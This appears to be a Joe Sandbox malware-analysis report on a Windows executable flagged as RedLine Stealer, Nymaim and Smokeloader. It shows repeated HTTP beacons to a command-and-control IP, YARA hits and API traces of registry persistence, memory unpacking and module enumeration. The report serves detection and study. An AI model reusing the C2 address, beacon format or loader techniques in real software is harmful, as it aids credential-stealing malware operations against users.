                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  1 | 192.168.2.4 | 49737 | 185.156.72.65 | 80 | 5796 | C:\Users\user\Desktop\file.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Nov 30, 2024 13:51:24.093640089 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  2 | 192.168.2.4 | 49738 | 185.156.72.65 | 80 | 5796 | C:\Users\user\Desktop\file.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Nov 30, 2024 13:51:49.205323935 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  3 | 192.168.2.4 | 49746 | 185.156.72.65 | 80 | 5796 | C:\Users\user\Desktop\file.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Nov 30, 2024 13:52:00.351347923 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  4 | 192.168.2.4 | 49802 | 185.156.72.65 | 80 | 5796 | C:\Users\user\Desktop\file.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Nov 30, 2024 13:52:25.585403919 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  5 | 192.168.2.4 | 49858 | 185.156.72.65 | 80 | 5796 | C:\Users\user\Desktop\file.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Nov 30, 2024 13:52:50.707751036 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  6 | 192.168.2.4 | 49912 | 185.156.72.65 | 80 | 5796 | C:\Users\user\Desktop\file.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Nov 30, 2024 13:53:15.773116112 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  7 | 192.168.2.4 | 49968 | 185.156.72.65 | 80 | 5796 | C:\Users\user\Desktop\file.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Nov 30, 2024 13:53:40.834578037 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  8 | 192.168.2.4 | 50010 | 185.156.72.65 | 80 | 5796 | C:\Users\user\Desktop\file.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Nov 30, 2024 13:54:06.029354095 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  9 | 192.168.2.4 | 50011 | 185.156.72.65 | 80 | 5796 | C:\Users\user\Desktop\file.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Nov 30, 2024 13:54:31.021220922 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  10 | 192.168.2.4 | 50012 | 185.156.72.65 | 80 | 5796 | C:\Users\user\Desktop\file.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Nov 30, 2024 13:54:51.991610050 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                  User-Agent: 1
                  Host: 185.156.72.65
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Target ID:0
                  Start time:07:50:54
                  Start date:30/11/2024
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\file.exe"
                  Imagebase:0x400000
                  File size:2'029'568 bytes
                  MD5 hash:C54023B84D77E5CE72A48EDA24BBC227
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4101686121.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.1656980225.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  Reputation:low
                  Has exited:false

                    Execution Graph

                    Execution Coverage:1.6%
                    Dynamic/Decrypted Code Coverage:5.3%
                    Signature Coverage:3.5%
                    Total number of Nodes:566
                    Total number of Limit Nodes:5
29891 406c76 29891->29886 30067 409fd7 42 API calls 29891->30067 29893 406c94 30068 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 29893->30068 29896 40239b 29895->29896 29897 4023b6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29895->29897 29896->29897 29898 40cfef 39 API calls 29896->29898 29897->29542 29899 4023da 29898->29899 29900 402411 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29899->29900 29901 40cfef 39 API calls 29899->29901 29900->29542 29902 40245c 29901->29902 29904 406f48 29903->29904 29905 406f0e 29903->29905 29907 409a17 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 29904->29907 30069 409cc5 6 API calls 29905->30069 29909 406f5b 29907->29909 29908 406f18 29908->29904 30070 409fd7 42 API calls 29908->30070 29909->29544 29911 406f3e 30071 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 29911->30071 29914 4017b3 _unexpected 29913->29914 30072 409b8a 29914->30072 29916 4017ca _unexpected 29916->29673 29918 40845e 29917->29918 29919 408422 29917->29919 29920 409a17 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 29918->29920 30099 409cc5 6 API calls 29919->30099 29922 408470 29920->29922 29922->29682 29923 40842c 29923->29918 30100 409fd7 42 API calls 29923->30100 29925 408454 30101 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 29925->30101 29928 40839c 29927->29928 29936 4083ce 29927->29936 30102 409cc5 6 API calls 29928->30102 29930 409a17 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 29931 4083e0 29930->29931 29931->29709 29932 4083a6 29932->29936 30103 409fd7 42 API calls 29932->30103 29934 4083c4 30104 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 29934->30104 29936->29930 29938 408352 29937->29938 29939 40830d 29937->29939 29941 409a17 
__ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 29938->29941 30105 409cc5 6 API calls 29939->30105 29942 408365 29941->29942 29942->29731 29943 408317 29943->29938 30106 409fd7 42 API calls 29943->30106 29945 408348 30107 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 29945->30107 29948 408db4 29947->29948 30108 409310 29948->30108 29950 40690e 29951 408e00 29950->29951 29952 408e1b 29951->29952 29954 408e2f __InternalCxxFrameHandler 29952->29954 30114 402840 43 API calls 3 library calls 29952->30114 29954->29767 30115 409130 29955->30115 29957 40693b 29957->29775 29958->29554 29959->29560 29960->29566 29961->29579 29962->29588 29963->29627 29964->29622 29965->29627 29966->29553 29967->29569 29968->29581 29969->29591 29970->29605 29971->29620 29972->29627 29973->29667 29974->29719 29975->29570 29976->29594 29977->29607 29978->29630 29979->29648 29980->29672 29981->29691 29982->29713 29983->29748 29984->29759 29985->29799 29986->29593 29987->29634 29988->29651 29989->29676 29990->29696 29991->29718 29992->29741 29993->29633 29994->29679 29995->29700 29996->29722 29997->29746 29998->29765 29999->29784 30000->29678 30001->29725 30002->29750 30003->29768 30004->29788 30005->29809 30006->29727 30007->29769 30008->29794 30009->29805 30010->29817 30011->29809 30012->29645 30013->29835 30014->29837 30015->29839 30018 4128fe 30017->30018 30019 4128f8 30017->30019 30023 412902 30018->30023 30047 4135e5 6 API calls __dosmaperr 30018->30047 30046 4135a6 6 API calls __dosmaperr 30019->30046 30022 41291a 30022->30023 30024 412922 30022->30024 30025 412987 SetLastError 30023->30025 30048 413294 14 API calls __dosmaperr 30024->30048 30028 405aa8 Sleep 30025->30028 30029 412997 30025->30029 30027 41292f 30031 412937 30027->30031 30032 412948 30027->30032 30028->29531 30055 411109 39 API calls _unexpected 30029->30055 30049 4135e5 6 API calls __dosmaperr 30031->30049 30050 4135e5 6 API calls __dosmaperr 
30032->30050 30036 412954 30038 412958 30036->30038 30039 41296f 30036->30039 30037 412945 30052 4132f1 14 API calls __dosmaperr 30037->30052 30051 4135e5 6 API calls __dosmaperr 30038->30051 30053 412710 14 API calls __dosmaperr 30039->30053 30043 41296c 30043->30025 30044 41297a 30054 4132f1 14 API calls __dosmaperr 30044->30054 30046->30018 30047->30022 30048->30027 30049->30037 30050->30036 30051->30037 30052->30043 30053->30044 30054->30043 30057 409a20 IsProcessorFeaturePresent 30056->30057 30058 409a1f 30056->30058 30060 409a67 30057->30060 30058->29880 30065 409a2a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 30060->30065 30062 409b4a 30062->29880 30063->29874 30064->29881 30065->30062 30066->29891 30067->29893 30068->29886 30069->29908 30070->29911 30071->29904 30074 409b4c 30072->30074 30075 409b6b 30074->30075 30077 409b6d 30074->30077 30086 40fb4d 30074->30086 30095 4116b2 EnterCriticalSection LeaveCriticalSection __dosmaperr 30074->30095 30075->29916 30078 401560 Concurrency::cancel_current_task 30077->30078 30079 409b77 30077->30079 30093 40af80 RaiseException 30078->30093 30096 40af80 RaiseException 30079->30096 30082 40157c 30094 40ad31 40 API calls 2 library calls 30082->30094 30083 40a589 30085 4015a3 30085->29916 30091 413cb9 __dosmaperr 30086->30091 30087 413cf7 30098 40d0dd 14 API calls __dosmaperr 30087->30098 30089 413ce2 RtlAllocateHeap 30090 413cf5 30089->30090 30089->30091 30090->30074 30091->30087 30091->30089 30097 4116b2 EnterCriticalSection LeaveCriticalSection __dosmaperr 30091->30097 30093->30082 30094->30085 30095->30074 30096->30083 30097->30091 30098->30090 30099->29923 30100->29925 30101->29918 30102->29932 30103->29934 30104->29936 30105->29943 30106->29945 30107->29938 30109 409398 30108->30109 30112 40932a __InternalCxxFrameHandler 30108->30112 30113 4095d0 43 API calls 4 library calls 30109->30113 30111 4093aa 30111->29950 30112->29950 30113->30111 30114->29954 30116 409173 
30115->30116 30117 4092fd 30116->30117 30118 40923d 30116->30118 30126 409178 __InternalCxxFrameHandler 30116->30126 30134 401600 43 API calls 3 library calls 30117->30134 30121 409272 30118->30121 30122 409298 30118->30122 30120 409302 30135 401560 41 API calls 2 library calls 30120->30135 30121->30120 30124 40927d 30121->30124 30131 40928a __InternalCxxFrameHandler 30122->30131 30133 401560 41 API calls 3 library calls 30122->30133 30132 401560 41 API calls 3 library calls 30124->30132 30125 409283 30129 40cfef 39 API calls 30125->30129 30125->30131 30126->29957 30130 40930c 30129->30130 30131->29957 30132->30125 30133->30131 30134->30120 30135->30125 30136 605df2 30137 607ca4 LoadLibraryA 30136->30137 30139 609654 30137->30139 30140 706fc3 Sleep 30141 707012 30140->30141 30142 47a7cb9 30145 47a7cc4 30142->30145 30146 47a7cd3 30145->30146 30149 47a8464 30146->30149 30151 47a847f 30149->30151 30150 47a8488 CreateToolhelp32Snapshot 30150->30151 30152 47a84a4 Module32First 30150->30152 30151->30150 30151->30152 30153 47a7cc3 30152->30153 30154 47a84b3 30152->30154 30156 47a8123 30154->30156 30157 47a814e 30156->30157 30158 47a8197 30157->30158 30159 47a815f VirtualAlloc 30157->30159 30158->30158 30159->30158 30160 706888 VirtualProtect 30161 7068a9 30160->30161 30162 495003c 30163 4950049 30162->30163 30164 495004c 30162->30164 30178 4950e0f SetErrorMode SetErrorMode 30164->30178 30169 4950265 30170 49502ce VirtualProtect 30169->30170 30171 495030b 30170->30171 30172 4950439 VirtualFree 30171->30172 30176 49505f4 LoadLibraryA 30172->30176 30177 49504be 30172->30177 30173 49504e3 LoadLibraryA 30173->30177 30175 49508c7 30176->30175 30177->30173 30177->30176 30179 4950223 30178->30179 30180 4950d90 30179->30180 30181 4950dad 30180->30181 30182 4950dbb GetPEB 30181->30182 30183 4950238 VirtualAlloc 30181->30183 30182->30183 30183->30169 30184 606b4b 30185 60a846 30184->30185 30186 60a8d4 RegOpenKeyA 30185->30186 30187 60a8fb RegOpenKeyA 30185->30187 30186->30187 30188 
60a8f1 30186->30188 30189 60a918 30187->30189 30188->30187 30190 60a95c GetNativeSystemInfo 30189->30190 30191 608982 30189->30191 30190->30191
                    APIs
                    • GetTempPathA.KERNEL32(00000104,?,73BDA22C,74DF0F00,00000000), ref: 00403DAA
                    • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F39
                    • Sleep.KERNEL32(000003E8), ref: 00403F42
                    • __Init_thread_footer.LIBCMT ref: 00404517
                    • __Init_thread_footer.LIBCMT ref: 004046DD
                    • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 004048E7
                    • __Init_thread_footer.LIBCMT ref: 00404975
                    • __Init_thread_footer.LIBCMT ref: 00404BDE
                    • CoInitialize.OLE32(00000000), ref: 00404C5F
                    • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404C7A
                    • __Init_thread_footer.LIBCMT ref: 004050DD
                    • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                    • __Init_thread_footer.LIBCMT ref: 004053EB
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404CE8
                      • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,73BDA22C), ref: 00410837
                      • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                    • CoUninitialize.OLE32(?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71,?,?,?,?,00000000,0042D9A0), ref: 00404D21
                    • CoUninitialize.OLE32(?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404DE4
                    • CoUninitialize.OLE32(?,?,?,?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404E65
                    • __Init_thread_footer.LIBCMT ref: 00404046
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      • Part of subcall function 00402220: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402256
                      • Part of subcall function 00402220: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402277
                      • Part of subcall function 00402220: CloseHandle.KERNEL32(00000000), ref: 0040227E
                    • __Init_thread_footer.LIBCMT ref: 00404222
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                    • String ID: 185.156.72.65$O@K\$SUB=$Y@BA$ZK\.$get$rmBK
                    • API String ID: 995133137-3578497191
                    • Opcode ID: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                    • Instruction ID: 6a8ba5f9be4b72ae1469cca8882757b6bc7ac7481bdf7cf44a4378d84f27710c
                    • Opcode Fuzzy Hash: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                    • Instruction Fuzzy Hash: 44F2DFB0E042549BDB24DF24DC48B9EBBB0EF45304F5442E9E5097B2D2DB78AA84CF59

                    Control-flow Graph
                    • Graph for the function at 404f70 (executed / not-executed basic-block edge list from the IDA plugin; the rendered graph is not recoverable from the text). API calls named in the graph: Sleep, CoUninitialize, RegCreateKeyExA, RegOpenKeyExA, RegSetValueExA, RegCloseKey.
                    APIs
                      • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,73BDA22C), ref: 00410837
                      • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 004050DD
                    • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                    • __Init_thread_footer.LIBCMT ref: 004053EB
                    • Sleep.KERNEL32(000007D0), ref: 00405755
                    • Sleep.KERNEL32(000007D0), ref: 0040576F
                    • CoUninitialize.OLE32(?,?,0042DC19,?,?,?,?,?,?,?,?,?,?,00000000,0042DBDD), ref: 004057A5
                    • CoUninitialize.OLE32(?,?,?,?,?,0042DC19,?,?,?,?,?,?,?), ref: 004057D1
                    • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                    • Sleep.KERNEL32(000003E8), ref: 00405AB0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                    • String ID: 185.156.72.65$185.156.72.65$185.156.72.65$@BAO$SUB=$get$mixone$updateSW$u%
                    • API String ID: 606935701-1501174972
                    • Opcode ID: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                    • Instruction ID: 5b15cd53af07887682d130406d81e99ec93c25d434b47868d83c22c89ba1756f
                    • Opcode Fuzzy Hash: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                    • Instruction Fuzzy Hash: BBD20271D001149BDB18EB24CD49BAEBB75AF01304F5441BEE8097B2D2DB78AE85CF99

                    Control-flow Graph
                    • Graph for the function at 47a8464 (executed / not-executed basic-block edge list from the IDA plugin; the rendered graph is not recoverable from the text). API calls named in the graph: CreateToolhelp32Snapshot, Module32First.
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 047A848C
                    • Module32First.KERNEL32(00000000,00000224), ref: 047A84AC
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101686121.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_47a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFirstModule32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 3833638111-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction ID: 5dc7c83e20f23cc8e33816e0c8d348b8f7c13a94c26d9eda38bb56e96fa06e4a
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: 8DF09635100711AFE7203FF59C8CB6EB6E8BF89725F110728E642952C0DB74F8554AA2

                    Control-flow Graph
                    • Graph for the function at 4087e0 (executed / not-executed basic-block edge list from the IDA plugin; the rendered graph is not recoverable from the text). The graph names only internal subroutine calls, no Windows API calls.
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: mixtwo$nosub
                    • API String ID: 3472027048-187875987
                    • Opcode ID: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                    • Instruction ID: d051705d2d3a1196041d610bae506d61a1e8aa88cf060e84ab2565e50524cdd9
                    • Opcode Fuzzy Hash: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                    • Instruction Fuzzy Hash: AAD05286F0420822C00031BE2E0FA1C3A18064262EFA0122AE820226C3B8882A2489EF

                    Control-flow Graph
                    • Graph for the function at 706806 (executed / not-executed basic-block edge list from the IDA plugin; the rendered graph is not recoverable from the text). API call named in the graph: VirtualProtect.
                    APIs
                    • VirtualProtect.KERNEL32(?,00706802,00000004), ref: 0070689B
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000706000.00000040.00000001.01000000.00000003.sdmp, Offset: 00706000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_706000_file.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 4cb6c183d43e8fc2288822a573204162e5b2453ecf25750f029c2e2cbfc3349c
                    • Instruction ID: 52e027221de22c384212c66738c7f7a9fc369a946723064524be019914ce5a2d
                    • Opcode Fuzzy Hash: 4cb6c183d43e8fc2288822a573204162e5b2453ecf25750f029c2e2cbfc3349c
                    • Instruction Fuzzy Hash: BAF0A7B2908115FEEB10DF409530ABE3AF8EB85B30F30C715F806C65C1D2695C74A665

                    Control-flow Graph

                    APIs
                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018A3
                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018C9
                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018EF
                      • Part of subcall function 004024A0: Concurrency::cancel_current_task.LIBCPMT ref: 004025C9
                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401915
                    Strings
                    • text, xrefs: 00401B8F
                    • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004018A7
                    • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018F3
                    • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401862
                    • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004018CD
                    • http://, xrefs: 00401EF4, 004021D3
                    • GET, xrefs: 004020E7
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
